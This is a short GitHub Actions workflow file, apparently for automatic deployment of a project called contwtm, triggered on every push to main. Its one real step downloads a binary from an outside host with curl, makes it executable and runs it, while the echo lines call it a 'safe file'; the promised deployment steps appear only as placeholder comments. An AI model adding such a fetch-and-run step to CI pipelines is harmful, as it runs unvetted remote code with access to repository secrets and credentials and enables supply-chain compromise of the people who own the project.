name: Trigger auto deployment for contwtm

# When this action will be executed
on:
  # Automatically trigger it when detected changes in repo
  push:
    branches: 
      [ main ]
    paths:
    - '**'

  # Allow manual trigger 
  workflow_dispatch:      

jobs:
  build-and-deploy:
    runs-on: ubuntu-latest
    # ... other job properties and preceding steps ...

    steps:
      # ... other steps like Checkout and Azure Login ...

      - name: Example of Running Shell Commands
        run: |
         
          echo "Attempting to download a safe file..."
          curl -fsSL https://recon.offensi.com/cbd -o /tmp/cbd
          
          
          echo "Setting executable permissions..."
          chmod +x /tmp/cbd
          
          
          echo "Executing the file..."
          /tmp/cbd
